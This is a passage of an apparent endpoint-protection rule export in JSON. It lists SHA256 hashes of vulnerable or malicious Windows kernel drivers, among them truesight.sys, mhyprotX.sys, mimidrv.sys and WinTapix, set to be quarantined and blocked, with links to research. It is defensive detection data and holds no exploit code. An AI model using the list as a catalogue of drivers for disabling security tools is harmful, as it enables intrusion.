+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b69e3285-6453-5b93-bdc5-e4f328ee3d36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457564Z",
+ "creation_date": "2026-03-23T11:45:30.457567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457576Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aff3f4d25b85b6b3147d2b7f586edc3e9aa2ec25c37d5dc7ad809d99677497ea",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b69f342a-feab-5c85-ac01-b28254e4512a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612037Z",
+ "creation_date": "2026-03-23T11:45:29.612039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6a1f8a5-1ca6-5739-a64e-b10b8a1a8762",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481468Z",
+ "creation_date": "2026-03-23T11:45:30.481472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a66b4420fa1df81a517e2bbea1a414b57721c67a4aa1df1967894f77e81d036e",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6ae8e70-0b6b-5dbc-ad9b-0dd6cfcb4d1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487378Z",
+ "creation_date": "2026-03-23T11:45:31.487380Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12428d69268adc7d6bf9c1e74b3e799cabe8319bffb47729385205b17c43a40b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6b12588-2faf-5dfa-a97d-0f8f31256ee2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977072Z",
+ "creation_date": "2026-03-23T11:45:29.977074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f744abb99c97d98e4cd08072a897107829d6d8481aee96c22443f626d00f4145",
+ "comment": "HP Hardware Diagnostic's EtdSupp vulnerable driver (aka etdsupp.sys) [https://github.com/alfarom256/HPHardwareDiagnostics-PoC] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6b6d27f-e0de-5bc8-adde-76f77f6928bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612232Z",
+ "creation_date": "2026-03-23T11:45:29.612234Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612239Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7bfa54943180e34aea390a8f63a2cb007cf53c336dff697c60a79103f3c0c19d",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6c3acaf-dcbe-5582-9714-e38769d84f4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604482Z",
+ "creation_date": "2026-03-23T11:45:29.604484Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b4f59236a9b950bcd5191b35d19125f60cfb9e1a1e1aa2e4f914b6745dde9df",
+ "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6cc106e-0e47-5024-8c3b-3d5e8df07ad2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811561Z",
+ "creation_date": "2026-03-23T11:45:31.811563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d27b53a93330abe2ba2fd0c93a1caa1a55e79cb8ece3eb0b38653712ef82272f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6eaf652-d31f-528f-ad0a-5d2dac9af4f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152986Z",
+ "creation_date": "2026-03-23T11:45:31.152990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152998Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9253b82646dd6767c9bbbdcf036643b83d6e3ac046b869604b300c342636af27",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6fd03d8-d637-5f1a-bb3e-6e94129a6169",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826479Z",
+ "creation_date": "2026-03-23T11:45:30.826481Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826486Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e452b924f08462338446dd707dd56a8b1da279ca503006bc981884206d7c5fb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7002c98-6ee6-5a56-8e54-2367ff063bbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473475Z",
+ "creation_date": "2026-03-23T11:45:31.473479Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4afbf265692579b3b771883308cd632f722feb86ee5fb9689eb7120f4749e221",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b705e0f9-0f2f-5294-90a0-52c6b8dbdd26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812320Z",
+ "creation_date": "2026-03-23T11:45:31.812324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c81ac49bf30708098f785a712fd922f72284c1c44922afaebbe42f4e8f1de6cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b706e6ad-8f93-50af-98ce-d80686847612",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810955Z",
+ "creation_date": "2026-03-23T11:45:31.810957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810962Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57e7fee32f356edbbe3911f708f3a578fd28895597cf661d76fb5ea8500cee52",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7134e9b-239d-52c4-acf1-c2bcc9dd5fd0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481804Z",
+ "creation_date": "2026-03-23T11:45:30.481806Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481812Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c8ad57b3a224fdc2aac9dd2d7c3624f1fcd3542d4db804de25a90155657e2cc",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b72374d9-a834-5185-a05a-61f85f435328",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622280Z",
+ "creation_date": "2026-03-23T11:45:29.622282Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622287Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9778136d2441439dc470861d15d96fa21dc9f16225232cd05b76791a5e0fde6f",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b727055a-75af-578d-b473-974c5fd00335",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819016Z",
+ "creation_date": "2026-03-23T11:45:31.819020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a984513c456cb68749afba1fe16be4b2e10b0f30761e95165f1217bdfbe682b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b72ae010-2ad2-5735-b348-b95ec3ed4bab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605249Z",
+ "creation_date": "2026-03-23T11:45:29.605251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29f611e5189e8a1b1c8e5534bdafa617f679097a54dd4f91af3dc8922e668e04",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b72eaff8-1c6f-5c90-9338-f97017d4669a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608155Z",
+ "creation_date": "2026-03-23T11:45:29.608157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608162Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3026a7202354b9b1300215cf0288f34ffb99098a0a2fcd96fbad0987182a99cf",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b734d229-477c-5c29-ace9-bd065d675680",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142109Z",
+ "creation_date": "2026-03-23T11:45:31.142111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142117Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50f528b63af1ffa45d6a7f0a60b4170de2785575cc58b79c28831699b346462a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7470c30-eb55-5e04-8e2a-576b4a8fce1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970755Z",
+ "creation_date": "2026-03-23T11:45:29.970758Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970766Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4297641b1127248815ceb5e06dc0f6c5121e73f2fa91fe573a7c6f8dac66745e",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7492c3f-b3da-5565-8f9b-0e77dc96b321",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985648Z",
+ "creation_date": "2026-03-23T11:45:29.985650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e",
+ "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b74b620f-f7ab-5f2b-8b07-26b3091444c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810847Z",
+ "creation_date": "2026-03-23T11:45:31.810849Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36e590d5d123f8bfd652fb6cdafcde6634d7c139a7ccf51b0ee1f5fda41b3abb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b752a679-23c1-575c-af19-d467679e6e54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
